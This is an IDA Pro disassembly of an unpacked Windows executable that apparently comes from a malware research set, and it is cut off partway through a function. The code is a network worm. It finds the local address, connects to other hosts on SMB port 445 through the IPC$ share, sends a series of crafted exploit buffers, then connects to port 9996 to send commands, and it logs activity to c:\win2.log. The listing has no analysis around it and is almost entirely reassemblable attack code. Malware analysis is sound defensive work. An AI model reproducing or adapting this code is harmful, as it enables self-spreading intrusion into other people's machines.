;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : CA4413B3C2962FBD94F22C44E2E3FC3D
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure data
HEADER segment page public 'DATA' use32
assume cs:HEADER
;org 400000h
__ImageBase dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 ; DATA XREF: .rsrc:0040B472�o
dd 40h, 0
dd 79h, 6 dup(0)
dd 100h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 0
dd 915E25D4h, 3 dup(0C2304490h), 0C23A5B78h, 0C230448Ah
dd 0C23E5813h, 0C230449Bh, 0C2314490h, 0C23044D9h, 0C2235BF2h
dd 0C2304499h, 0C23B5B78h, 0C2304494h, 0C2364228h, 0C2304491h
dd 68636952h, 0C2304490h, 2 dup(0)
dd 4550h, 2014Ch, 4093E764h, 2 dup(0)
dd 10F00E0h, 6010Bh, 3E00h, 2200h, 0
dd 283Eh, 1000h, 4550h, 3014Ch, 3 dup(0)
dd 10F00E0h, 6010Bh, 3E00h, 2200h, 0
aFip db 'P|',0
db 10h, 2 dup(0)
dd 5000h, 400000h, 1000h, 200h, 4, 0
dd 4, 0
dd 23000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 22000h, 5C8h, 9000h, 10h, 1Ah dup(0)
a_text db '.text',0
align 10h
dd 8000h, 1000h, 6600h, 400h, 50454332h, 2 dup(0)
dd 0E0000020h, 7273722Eh, 63h, 19000h, 9000h, 18200h, 6A00h
dd 3 dup(0)
dd 0E0000020h, 6164692Eh, 6174h, 1000h, 22000h, 1000h
dd 1EC00h, 3 dup(0)
dd 0E0000020h, 64h dup(0)
align 1000h
HEADER ends
; File Name : u:\work\ca4413b3c2962fbd94f22c44e2e3fc3d_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00006600 ( 26112.)
; Offset to raw data for section: 00000400
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40127D+7C�p
; sub_401EF0:loc_401F35�p ...
mov eax, dword_406F30
imul eax, 343FDh
add eax, 279EC3h
mov dword_406F30, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: sub_402029+1F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_406F30, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: sub_402029+24�p
WSAData = WSAData ptr -190h
sub esp, 190h
lea eax, [esp+190h+WSAData]
push eax ; lpWSAData
push 101h ; wVersionRequested
call WSAStartup ; WSAStartup
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401045(char *cp)
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
cp = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+cp] ; cp
call inet_addr ; inet_addr
movsx ecx, al
mov [ebp+cp], eax
movsx edx, byte ptr [ebp+cp+2]
movsx esi, byte ptr [ebp+cp+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
loc_40106D: ; DATA XREF: .rsrc:loc_40B546�w
; sub_40B872+14�r ...
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40127D+9C�p
; sub_401EF0+1A�p
name = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+name]
push 0FFh ; namelen
push eax ; name
call gethostname ; gethostname
test eax, eax
jnz short loc_401136
lea eax, [ebp+name]
push eax ; name
call gethostbyname ; gethostbyname
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax] ; in
call inet_ntoa ; inet_ntoa
mov ebx, eax
push ebx ; cp
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call lstrcpy ; lstrcpy
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401EF0+E2�p
name = sockaddr ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h
lea eax, [ebp+name]
push 0
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push 1BDh ; hostshort
call htons ; htons
push [ebp+arg_0] ; name
mov word ptr [ebp+name.sa_data], ax
call sub_4011D5
mov dword ptr [ebp+name.sa_data+2], eax
push 8
lea eax, [ebp+name.sa_data+6]
push 0
push eax
call sub_4021B0
add esp, 10h
push 6 ; protocol
push 1
pop ebx
push ebx ; type
loc_4011A1: ; DATA XREF: sub_409BA7+7�r
push 2 ; af
call socket ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push esi ; s
call connect ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi ; s
call closesocket ; closesocket
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
loc_4011D2: ; DATA XREF: sub_409B29+1D�r
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4011D5(char *name)
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40127D+34�p ...
name = dword ptr 4
push esi
push edi
mov edi, [esp+8+name]
push edi ; cp
call inet_addr ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi ; name
call gethostbyname ; gethostbyname
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401210(LPCCH lpBuffer)
sub_401210 proc near ; CODE XREF: sub_40127D+F9�p
Buffer = byte ptr -14h
lpBuffer = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
inc dword_406F34
push edi
push dword_406F34
lea eax, [ebp+Buffer]
push offset aI ; "%i"
push eax ; LPSTR
call wsprintfA ; wsprintfA
add esp, 0Ch
push 0 ; iAttribute
push offset PathName ; "c:\\win2.log"
call _lcreat ; _lcreat
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40127A
lea eax, [ebp+Buffer]
push esi
push eax
call sub_402210
mov esi, _hwrite
pop ecx
push eax ; lBytes
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push edi ; hFile
call esi ; _hwrite
push [ebp+lpBuffer]
call sub_402210
pop ecx
push eax ; lBytes
push [ebp+lpBuffer] ; lpBuffer
push edi ; hFile
call esi ; _hwrite
push edi ; hFile
call _lclose ; _lclose
pop esi
loc_40127A: ; CODE XREF: sub_401210+37�j
pop edi
leave
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40127D(DWORD lpBuffer)
sub_40127D proc near ; CODE XREF: sub_401A84+7B�p
var_34C = dword ptr -34Ch
buf = byte ptr -33Ch
var_110 = byte ptr -110h
name = sockaddr ptr -10h
lpBuffer = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h
lea eax, [ebp+name]
push ebx
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push 270Ch ; hostshort
call htons ; htons
push [ebp+lpBuffer] ; name
mov word ptr [ebp+name.sa_data], ax
call sub_4011D5
mov dword ptr [ebp+name.sa_data+2], eax
push 8
lea eax, [ebp+name.sa_data+6]
push ebx
push eax
call sub_4021B0
add esp, 10h
push 6 ; protocol
push 1 ; type
push 2 ; af
call socket ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012E2
xor al, al
jmp loc_401394
; ---------------------------------------------------------------------------
loc_4012E2: ; CODE XREF: sub_40127D+5C�j
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push edi ; s
call connect ; connect
cmp eax, 0FFFFFFFFh
jz loc_40138B
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset byte_406F38
push eax
call lstrcpy ; lstrcpy
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push off_406030 ; LPCSTR
lea eax, [ebp+buf]
push eax ; LPSTR
call wsprintfA ; wsprintfA
lea eax, [ebp+buf]
xor esi, esi
push eax
call sub_402210
add esp, 1Ch
test eax, eax
jbe short loc_401373
loc_40134F: ; CODE XREF: sub_40127D+F4�j
push ebx ; flags
lea eax, [ebp+esi+buf]
push 1 ; len
push eax ; buf
push edi ; s
call send ; send
lea eax, [ebp+buf]
inc esi
push eax
call sub_402210
cmp esi, eax
pop ecx
jb short loc_40134F
loc_401373: ; CODE XREF: sub_40127D+D0�j
push [ebp+lpBuffer] ; lpBuffer
call sub_401210
mov [esp+34Ch+var_34C], 3E8h
call Sleep ; Sleep
mov bl, 1
pop esi
loc_40138B: ; CODE XREF: sub_40127D+75�j
push edi ; s
call closesocket ; closesocket
mov al, bl
loc_401394: ; CODE XREF: sub_40127D+60�j
pop edi
pop ebx
leave
retn
sub_40127D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401398(char *s, LPSTR)
sub_401398 proc near ; CODE XREF: sub_401A84+15�p
buf = byte ptr -744h
var_714 = byte ptr -714h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
s = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset byte_406F38
push [ebp+arg_4]
call lstrcpy ; lstrcpy
push [ebp+s]
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax ; LPSTR
call wsprintfA ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013D1: ; CODE XREF: sub_401398+49�j
mov dl, [ebp+ecx+var_3C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013D1
push 60h
lea eax, [ebp+var_B4]
push offset dword_4063E4
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_402290
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC+3)
push eax
call sub_402210
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
loc_40144C: ; DATA XREF: sub_409B29+31B�r
lea eax, [ebp+var_B1]
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
shl al, 1
add al, 9
push 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_87]
push eax
call sub_402290
add esp, 2Ch
push [ebp+s] ; name
call gethostbyname ; gethostbyname
mov ebx, eax
cmp ebx, edi
jz loc_401554
push edi ; protocol
push 1 ; type
push 2 ; af
loc_401495: ; DATA XREF: .text:off_4065D8�o
call socket ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+s], esi
jz loc_401554
push 1BDh ; hostshort
mov [ebp+var_14], 2
call htons ; htons
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8
push edi
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_C]
push eax
call sub_4021B0
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h ; namelen
push eax ; name
push esi ; s
call connect ; connect
cmp eax, 0FFFFFFFFh
jz short loc_401554
mov ebx, send
push edi ; flags
push 89h ; len
push offset buf ; buf
push esi ; s
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push edi ; flags
mov edi, 640h
lea eax, [ebp+buf]
push edi ; len
push eax ; buf
push esi ; s
mov esi, recv
call esi ; recv
push 0 ; flags
push 0A8h ; len
push offset byte_406258 ; buf
push [ebp+s] ; s
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push 0 ; flags
lea eax, [ebp+buf]
push edi ; len
push eax ; buf
push [ebp+s] ; s
call esi ; recv
push 0 ; flags
push 0DEh ; len
push offset byte_406304 ; buf
push [ebp+s] ; s
call ebx ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401558
loc_401554: ; CODE XREF: sub_401398+F2�j
; sub_401398+10B�j ...
xor eax, eax
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401398+1BA�j
push 0 ; flags
lea eax, [ebp+buf]
push edi ; len
push eax ; buf
push [ebp+s] ; s
call esi ; recv
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401570: ; CODE XREF: sub_401398+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
loc_401577: ; DATA XREF: .rsrc:0040A7BB�w
push offset aSC ; "%s%c"
push [ebp+arg_4] ; LPSTR
call wsprintfA ; wsprintfA
add esp, 10h
loc_401588: ; DATA XREF: sub_409B29+B7�w
; .rsrc:0040A3AE�r
inc esi
inc esi
dec edi
jnz short loc_401570
push [ebp+s] ; s
call closesocket ; closesocket
push 1
pop eax
loc_401599: ; CODE XREF: sub_401398+1BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401398 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40159E proc near ; CODE XREF: sub_401A84+3B�p
; sub_401A84+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
buf = byte ptr -754h
var_114 = byte ptr -114h
var_C4 = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
var_4C = byte ptr -4Ch
name = sockaddr ptr -24h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
s = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
loc_40159F: ; DATA XREF: sub_409B29+288�r
mov ebp, esp
mov eax, 89C4h
call sub_4025D0
mov eax, dword_406A34
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, dword_406A38
loc_4015BB: ; DATA XREF: sub_409B29+F0�r
mov [ebp+var_10], eax
lea eax, [ebp+var_4C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax ; LPSTR
call wsprintfA ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp-113h]
loc_4015D8: ; CODE XREF: sub_40159E+4A�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015D8
push ebx
push esi
push edi
push 60h
lea eax, [ebp+var_C4]
push offset dword_4063E4
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
shl eax, 1
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_94]
push eax
call sub_402290
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_402210
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_C1]
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
shl al, 1
add al, 9
push 1
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_97]
push eax
call sub_402290
add esp, 2Ch
push 270Ch ; hostshort
call htons ; htons
xor eax, 9999h
push 2
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push offset dword_4060E4
call sub_402290
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_40171A
cmp ebx, 2
jz short loc_40171A
push 7D0h
lea eax, [ebp+var_F24]
push 90h
push eax
call sub_4021B0
mov esi, offset loc_406034
push esi
call sub_402210
push eax
lea eax, [ebp+var_E84]
push esi
push eax
call sub_402290
lea eax, [ebp+var_14]
push eax
call sub_402210
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_768]
push eax
call sub_402290
add esp, 2Ch
imul ebx, 3Ch
mov eax, dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017EE
; ---------------------------------------------------------------------------
loc_40171A: ; CODE XREF: sub_40159E+115�j
; sub_40159E+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi
push 90h
push eax
call sub_4021B0
imul ebx, 3Ch
push 4
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx
push eax
call sub_402290
mov esi, offset loc_406034
push esi
call sub_402210
push eax
lea eax, [ebp+var_24C4]
push esi
push eax
call sub_402290
push 4
lea eax, [ebp+var_21A0]
push offset dword_406A2C
push eax
call sub_402290
push 4
lea eax, [ebp+var_219C]
push ebx
push eax
call sub_402290
add esp, 40h
push esi
call sub_402210
push eax
lea eax, [ebp+var_2190]
push esi
push eax
call sub_402290
add esp, 10h
xor ecx, ecx
lea eax, [ebp-4813h]
loc_4017A6: ; CODE XREF: sub_40159E+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_4017A6
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi
push 31h
push eax
call sub_4021B0
push esi
lea eax, [ebp+var_68EC]
push 31h
push eax
call sub_4021B0
add esp, 18h
loc_4017EE: ; CODE XREF: sub_40159E+177�j
push 0 ; protocol
push 1 ; type
push 2 ; af
call socket ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+s], edi
jz loc_401A7D
push 1BDh ; hostshort
mov [ebp+name.sa_family], 2
call htons ; htons
push [ebp+arg_0] ; name
mov word ptr [ebp+name.sa_data], ax
call sub_4011D5
mov dword ptr [ebp+name.sa_data+2], eax
xor ebx, ebx
push 8
lea eax, [ebp+name.sa_data+6]
push ebx
push eax
call sub_4021B0
add esp, 10h
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push edi ; s
call connect ; connect
cmp eax, 0FFFFFFFFh
jz loc_401A7D
mov esi, send
push ebx ; flags
push 89h ; len
push offset buf ; buf
push edi ; s
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push ebx ; flags
mov ebx, 640h
lea eax, [ebp+buf]
push ebx ; len
push eax ; buf
push edi ; s
mov edi, recv
call edi ; recv
push 0 ; flags
push 0A8h ; len
push offset byte_406258 ; buf
push [ebp+s] ; s
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0 ; flags
lea eax, [ebp+buf]
push ebx ; len
push eax ; buf
push [ebp+s] ; s
call edi ; recv
push 0 ; flags
push 0DEh ; len
push offset byte_406304 ; buf
push [ebp+s] ; s
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0 ; flags
lea eax, [ebp+buf]
push ebx ; len
push eax ; buf
push [ebp+s] ; s
call edi ; recv
movsx eax, [ebp+var_5]
add eax, 4
push 0 ; flags
push eax ; len
lea eax, [ebp+var_C4]
push eax ; buf
push [ebp+s] ; s
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0 ; flags
lea eax, [ebp+buf]
push ebx ; len
push eax ; buf
push [ebp+s] ; s
call edi ; recv
push 0 ; flags
push 68h ; len
push offset byte_406448 ; buf
push [ebp+s] ; s
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0 ; flags
lea eax, [ebp+buf]
push ebx ; len
push eax ; buf
push [ebp+s] ; s
call edi ; recv
push 0 ; flags
push 0A0h ; len
push offset byte_4064B4 ; buf
push [ebp+s] ; s
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0 ; flags
lea eax, [ebp+buf]
push ebx ; len
push eax ; buf
push [ebp+s] ; s
call edi ; recv
cmp [ebp+arg_4], 1
jz short loc_4019BB
cmp [ebp+arg_4], 2
jz short loc_4019BB
push 7Ch
lea eax, [ebp+var_1F08]
push offset dword_406558
push eax
call sub_402290
lea eax, [ebp+var_F24]
push 7D0h
push eax
lea eax, [ebp+var_1E8C]
push eax
call sub_402290
push 90h
lea eax, [ebp+var_16BC]
push offset off_4065D8
push eax
call sub_402290
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A5E
; ---------------------------------------------------------------------------
loc_4019BB: ; CODE XREF: sub_40159E+3B8�j
; sub_40159E+3BE�j
push 68h
lea eax, [ebp+var_89C4]
push offset dword_40666C
push eax
call sub_402290
lea eax, [ebp+var_4814]
push 1B5Ah
push eax
lea eax, [ebp+var_895C]
push eax
call sub_402290
push 70h
lea eax, [ebp+var_68EC]
push offset dword_4066D8
push eax
call sub_402290
lea eax, [ebp+var_3780]
push 0A5Eh
push eax
lea eax, [ebp+var_687C]
push eax
call sub_402290
push 84h
lea eax, [ebp+var_5DB8]
push offset dword_40674C
push eax
call sub_402290
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0 ; flags
push 10FCh ; len
push eax ; buf
push [ebp+s] ; s
call esi ; send
loc_401A3D: ; DATA XREF: .rsrc:00409C8D�r
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 0 ; flags
lea eax, [ebp+buf]
push ebx ; len
push eax ; buf
push [ebp+s] ; s
call edi ; recv
push 0 ; flags
push 0FDCh ; len
lea eax, [ebp+var_68EC]
loc_401A5E: ; CODE XREF: sub_40159E+418�j
push eax ; buf
push [ebp+s] ; s
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 3E8h ; dwMilliseconds
call Sleep ; Sleep
push [ebp+s] ; s
call closesocket ; closesocket
loc_401A7D: ; CODE XREF: sub_40159E+264�j
; sub_40159E+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_40159E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401A84(DWORD s)
sub_401A84 proc near ; CODE XREF: sub_402029+3A�p
var_84 = byte ptr -84h
s = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+s]
lea eax, [ebp+var_84]
push eax ; LPSTR
push esi ; s
call sub_401398
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401B05
lea eax, [ebp+var_84]
push offset dword_406A40
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401AC8
push 0
push esi
call sub_40159E
push 0
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AC8: ; CODE XREF: sub_401A84+36�j
lea eax, [ebp+var_84]
push offset dword_406A3C
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401AEB
push 1
push esi
call sub_40159E
push 1
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AEB: ; CODE XREF: sub_401A84+59�j
push 2
push esi
call sub_40159E
push 2
loc_401AF5: ; CODE XREF: sub_401A84+42�j
; sub_401A84+65�j
push esi
call sub_40159E
add esp, 10h
push esi ; lpBuffer
call sub_40127D
pop ecx
loc_401B05: ; CODE XREF: sub_401A84+1F�j
pop esi
leave
retn
sub_401A84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; DATA XREF: sub_401E65+74�o
PathName = byte ptr -8E4h
buf = byte ptr -4E4h
var_4E0 = byte ptr -4E0h
var_E4 = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
name = sockaddr ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
s = dword ptr -0Ch
hFile = dword ptr -8
var_4 = word ptr -4
Buffer = byte ptr -2
var_1 = byte ptr -1
hostshort = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+hostshort]
cmp ebx, 0FFFFFFFFh
jz loc_401E29
push esi
push edi
push 0 ; flags
push off_4068D0
call sub_402210
mov esi, send
pop ecx
push eax ; len
push off_4068D0 ; buf
push ebx ; s
call esi ; send
mov edi, [ebp+hostshort]
jmp short loc_401B46
; ---------------------------------------------------------------------------
loc_401B43: ; CODE XREF: StartAddress+310�j
